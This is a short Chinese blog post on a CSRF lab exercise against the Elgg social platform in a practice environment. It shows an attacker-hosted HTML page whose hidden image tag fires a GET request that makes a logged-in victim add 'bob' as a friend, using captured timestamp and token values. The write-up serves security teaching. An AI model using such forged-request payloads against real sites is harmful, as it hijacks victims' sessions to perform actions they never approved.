一次crsf攻击实验 针对get请求

0

实验楼实验之elgg系统攻击实验

有一个添加用户bob的请求链接如下:

http://www.csrflabelgg.com/ac...

我们可以在www.csrflabattacker.com构造一个页面,让合法登录用户访问后,就会添加bob为好友

<html>
<img src="http://www.csrflabelgg.com/ac...;__elgg_ts=1524817660&__elgg_token=f581b9c0b6fab2aa1c5b5c64a7b4cf0c">
</html> (注意这里的ts和token取当时环境抓包的值)

这样用户Alice在登录 http://www.csrflabelgg.com 后,再登录攻击网站,攻击语句就会生效。
wm

你可能感兴趣的

载入中...